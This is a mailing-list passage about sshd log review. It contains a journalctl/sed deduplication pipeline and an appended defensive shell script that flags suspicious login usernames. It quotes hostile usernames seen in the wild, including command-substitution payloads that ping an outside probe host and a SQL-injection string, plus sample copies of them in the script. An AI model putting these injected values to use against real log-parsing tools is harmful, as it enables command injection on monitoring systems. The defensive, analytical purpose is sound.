[...]
journalctl -t sshd -o cat \
| grep -v '^Accepted ' \
| sed -E 's/[Uu]ser \S+/user .../' \
| sed -E 's/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/0.0.0.0/' \
| sed -E 's/port\s+[0-9]+/port 0/' \
| sed -E 's/".*"/"..."/' \
| sed -E 's/Change of username or service not allowed: .+/Change of username or service not allowed: .../' \
| sed -E 's/Their offer: .+/Their offer: .../' \
| sort -u

I found a select few attempts to mess with, identify, or exploit log parsing IDS/IPS software like fail2ban (and feel confirmed in my choice of an alternative solution with far less attack surface, see my other mail):

Invalid user $(ping -c 1 16e939dc.ad.xspzo.com) from ...
Invalid user ' $(ping -c 1 16e939dc.ad.xspzo.com) from ...
Invalid user ' or '1'='1' - from 176.100.42.41
[...]

May I suggest you take a look at logcheck(8)? It seems that this is what you are looking for.

_______________________________________________
openssh-unix-dev mailing list
openssh-unix-dev@xxxxxxxxxxx
https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
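Added example, not part of the original thread: a POSIX shell filter that picks out "Invalid user" lines like the ones quoted above, where the username field is not a plain account name, while treating the log text strictly as data. It assumes the message shape "Invalid user <name> from <addr> port <n>"; the function names, sample lines, addresses and placeholder domain are constructed for illustration.

```shell
#!/bin/sh
# Constructed sample lines (documentation addresses, placeholder domain).
# The quoted 'EOF' keeps the shell from expanding anything inside the heredoc.
sample_log() {
  cat <<'EOF'
Invalid user admin from 192.0.2.10 port 40022
Invalid user $(ping -c 1 probe.example.invalid) from 192.0.2.11 port 40023
Invalid user ' or '1'='1' - from 192.0.2.12 port 40024
Accepted publickey for alice from 192.0.2.14 port 40026 ssh2
EOF
}

# Reads sshd messages on stdin and prints "<addr><TAB><username>" for every
# "Invalid user" line whose username has characters outside [A-Za-z0-9._-].
# The username is attacker-controlled: it is only ever expanded inside double
# quotes and never passed to eval, sh -c, or an unquoted command line.
flag_odd_usernames() {
  while IFS= read -r line; do
    case $line in
      'Invalid user '*' from '*' port '*) ;;
      *) continue ;;
    esac
    rest=${line#Invalid user }
    # Shortest-suffix removal cuts at the LAST " from ", so spaces or the
    # word "from" inside the username cannot shift the address field.
    user=${rest% from * port *}
    tail=${rest#"$user"}          # " from <addr> port <n>"
    addr=${tail# from }
    addr=${addr%% port *}
    case $user in
      ''|*[!A-Za-z0-9._-]*) printf '%s\t%s\n' "$addr" "$user" ;;
    esac
  done
}

# Stand-alone run over the constructed sample.
sample_log | flag_odd_usernames
```

On a live host the same function can be fed from `journalctl -t sshd -o cat` in place of `sample_log`.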